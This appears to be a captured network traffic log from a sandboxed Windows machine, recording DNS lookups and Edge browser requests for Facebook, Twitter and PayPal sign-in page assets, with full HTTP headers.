referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: image/gif
reporting-endpoints:
content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: *
strict-transport-security: max-age=31536000; preload; includeSubDomains
x-fb-debug: 7AQT8v0PwXYbJDzf0hx2n8u2R87BeP3iABVxcFYgbx5LZPUIJknmPSOyUqXfSKvN9EFfRB2l93BCR1MrybcGFQ==
date: Mon, 30 Oct 2023 06:48:26 GMT
alt-svc: h3=":443"; ma=86400
DNS

80.41.65.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.41.65.18.in-addr.arpa

IN PTR

Response

80.41.65.18.in-addr.arpa

IN PTR

server-18-65-41-80ams1r cloudfrontnet
DNS

80.41.65.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.41.65.18.in-addr.arpa

IN PTR

Response

80.41.65.18.in-addr.arpa

IN PTR

server-18-65-41-80ams1r cloudfrontnet
DNS

206.246.238.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.246.238.18.in-addr.arpa

IN PTR

Response

206.246.238.18.in-addr.arpa

IN PTR

server-18-238-246-206ams58r cloudfrontnet
DNS

206.246.238.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.246.238.18.in-addr.arpa

IN PTR

Response

206.246.238.18.in-addr.arpa

IN PTR

server-18-238-246-206ams58r cloudfrontnet
DNS

213.28.22.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.28.22.171.in-addr.arpa

IN PTR

Response
DNS

twitter.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

twitter.com

IN A

Response

twitter.com

IN A

104.244.42.129
GET

https://twitter.com/favicon.ico

MicrosoftEdge.exe

Remote address:

104.244.42.129:443

Request

GET /favicon.ico HTTP/2.0
host: twitter.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:31 UTC
perf: 7626143928
server: tsa_o
set-cookie: guest_id=v1%3A169864851187427554; Max-Age=34214400; Expires=Fri, 29 Nov 2024 06:48:31 GMT; Path=/; Domain=.twitter.com; Secure
content-type: image/x-icon
cache-control: no-cache, no-store, max-age=0
content-length: 1150
x-transaction-id: 6fe726dd6b4446b8
strict-transport-security: max-age=631138519
x-response-time: 99
x-connection-hash: 57f5c21e3cbbd3eba24419f6a9da8af30713b34b26b2b60d60b2a3563c2705ea
DNS

129.42.244.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

129.42.244.104.in-addr.arpa

IN PTR

Response
DNS

18.175.53.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.175.53.84.in-addr.arpa

IN PTR

Response

18.175.53.84.in-addr.arpa

IN PTR

a84-53-175-18deploystaticakamaitechnologiescom
DNS

www.paypalobjects.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.paypalobjects.com

IN A

Response

www.paypalobjects.com

IN CNAME

ppo.glb.paypal.com

ppo.glb.paypal.com

IN CNAME

cs1150.wpc.betacdn.net

cs1150.wpc.betacdn.net

IN A

192.229.221.25
DNS

static-assets-prod.unrealengine.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

static-assets-prod.unrealengine.com

IN A

Response

static-assets-prod.unrealengine.com

IN CNAME

d1z9autcf703pk.cloudfront.net

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.22

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.105

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.73

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.103
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/css/app.css

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/css/app.css HTTP/2.0
host: www.paypalobjects.com
accept: text/css, */*
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: text/css
date: Mon, 30 Oct 2023 06:48:31 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fc-82ea"
expires: Tue, 29 Oct 2024 06:48:31 GMT
last-modified: Wed, 04 Oct 2023 15:25:48 GMT
paypal-debug-id: 2220efebff0e9
server: ECAcc (ama/48C6)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000002220efebff0e9-8e11609cb6169aa9-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 6717
GET

https://www.paypalobjects.com/pa/js/pa.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/js/pa.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:31 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653774ca-10f45"
expires: Mon, 30 Oct 2023 07:48:31 GMT
last-modified: Tue, 24 Oct 2023 07:39:54 GMT
paypal-debug-id: 8b09f8d5d8d0d
server: ECAcc (ama/48DF)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000008b09f8d5d8d0d-c534e9bf0f466684-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 25375
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/modernizr-2.6.1.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/modernizr-2.6.1.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:31 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-f4c"
expires: Tue, 29 Oct 2024 06:48:31 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 10ca7e7dde4b9
server: ECAcc (ama/48AE)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000010ca7e7dde4b9-70c41b86ccfd63d2-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 1869
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/authchallenge.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/authchallenge.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:31 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-7c28"
expires: Tue, 29 Oct 2024 06:48:31 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: f92ed3f8fb551
server: ECAcc (ama/4903)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000f92ed3f8fb551-5edd7264d004565f-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 6734
GET

https://www.paypalobjects.com/pa/mi/paypal/latmconf.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/mi/paypal/latmconf.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.paypal.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:31 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "653774ca-53a06+gzip"
expires: Mon, 30 Oct 2023 07:48:31 GMT
last-modified: Tue, 24 Oct 2023 07:39:54 GMT
paypal-debug-id: f3cc28aec8489
server: ECAcc (ama/48A7)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000f3cc28aec8489-4e60e5b636d846fd-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 38237
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/require.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/require.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:31 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-3a9d"
expires: Tue, 29 Oct 2024 06:48:31 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 2142e34440e29
server: ECAcc (ama/48D6)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000002142e34440e29-91f988671423476d-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 6157
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v3.html?siteKey=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&locale.x=en_US&country.x=US&checkConnectionTimeout=5000&source=recaptchaV3Eval&timestamp=1698648501553&}&action=default

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v3.html?siteKey=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&locale.x=en_US&country.x=US&checkConnectionTimeout=5000&source=recaptchaV3Eval&timestamp=1698648501553&}&action=default HTTP/2.0
host: www.paypalobjects.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
cache-control: max-age=31536000, s-maxage=31536000
content-type: text/html
date: Mon, 30 Oct 2023 06:48:32 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fe-16f9"
expires: Tue, 29 Oct 2024 06:48:32 GMT
last-modified: Wed, 04 Oct 2023 15:25:50 GMT
paypal-debug-id: e90445319c206
server: ECAcc (ama/48BD)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000e90445319c206-a318e0673723c7a9-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 2116
GET

https://www.paypalobjects.com/pa/3pjs/tl/6.2.0/patleaf.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/tl/6.2.0/patleaf.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.paypal.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:32 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653774cb-2fbb4"
expires: Mon, 30 Oct 2023 07:48:32 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: 82418951b7ee2
server: ECAcc (ama/48DC)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000082418951b7ee2-1eaa5907333e4315-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 52759
GET

https://www.paypalobjects.com/pa/3pjs/tl/6.2.0/patlcfg.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/tl/6.2.0/patlcfg.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.paypal.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:33 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "653774cb-190a+gzip"
expires: Mon, 30 Oct 2023 07:48:33 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: 7e0c87d37cfdd
server: ECAcc (ama/48AE)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000007e0c87d37cfdd-682e4e73a1890244-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 2672
GET

https://www.paypalobjects.com/images/shared/momgram@2x.png

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /images/shared/momgram@2x.png HTTP/2.0
host: www.paypalobjects.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ch: DPR, Viewport-Width, Width, ECT, Downlink
accept-ranges: bytes
cache-control: s-maxage=31536000, public,max-age=3600
content-type: image/png
date: Mon, 30 Oct 2023 06:48:33 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "60271b47-7cc"
expires: Mon, 30 Oct 2023 07:48:33 GMT
last-modified: Sat, 13 Feb 2021 00:20:23 GMT
paypal-debug-id: 876fb22f78f3c
server: ECAcc (ama/48E3)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000876fb22f78f3c-2a3110576be3158b-01
x-cache: HIT
x-content-type-options: nosniff
content-length: 1996
GET

https://www.paypalobjects.com/pa/3pjs/qualtrics/1.64.1/OrchestratorMain.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/qualtrics/1.64.1/OrchestratorMain.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.paypal.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:33 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "653774cb-1d47"
expires: Mon, 30 Oct 2023 07:48:33 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: 705bef507ab79
server: ECAcc (ama/4882)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000705bef507ab79-d65fa56a5df2c24e-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 3329
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/config.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/config.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:33 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-7c5"
expires: Tue, 29 Oct 2024 06:48:33 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 7eb6a47009246
server: ECAcc (ama/48B3)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000007eb6a47009246-d1d8a1dae49c609e-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 697
GET

https://www.paypalobjects.com/pa/3pjs/qualtrics/1.64.1/12.2e4d3453d92fa382c1f6.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/qualtrics/1.64.1/12.2e4d3453d92fa382c1f6.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:36 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "653774cb-e017+gzip"
expires: Mon, 30 Oct 2023 07:48:36 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: 87e2453688047
server: ECAcc (ama/48CB)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000087e2453688047-a6c1db644d590a68-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 16141
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/app.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/app.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:48:43 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fc-49d"
expires: Tue, 29 Oct 2024 06:48:43 GMT
last-modified: Wed, 04 Oct 2023 15:25:48 GMT
paypal-debug-id: 185f0adeaa211
server: ECAcc (ama/48F9)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000185f0adeaa211-6e1f3cf986b5fa3a-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 595
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/core/nougat.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/core/nougat.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-265b"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 9661b20217103
server: ECAcc (ama/48F7)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000009661b20217103-55fa1b2dec39863a-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 2739
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/router.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/router.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-72f"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: adda90faebd8a
server: ECAcc (ama/48B3)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000adda90faebd8a-b62530a9bac05ffe-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 820
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/widgets/analytics.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/widgets/analytics.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-974"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: a1806f4a577b7
server: ECAcc (ama/489A)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000a1806f4a577b7-7f62087828f0c250-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 898
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/opinionLab/opinionLabComponent.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/opinionLab/opinionLabComponent.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
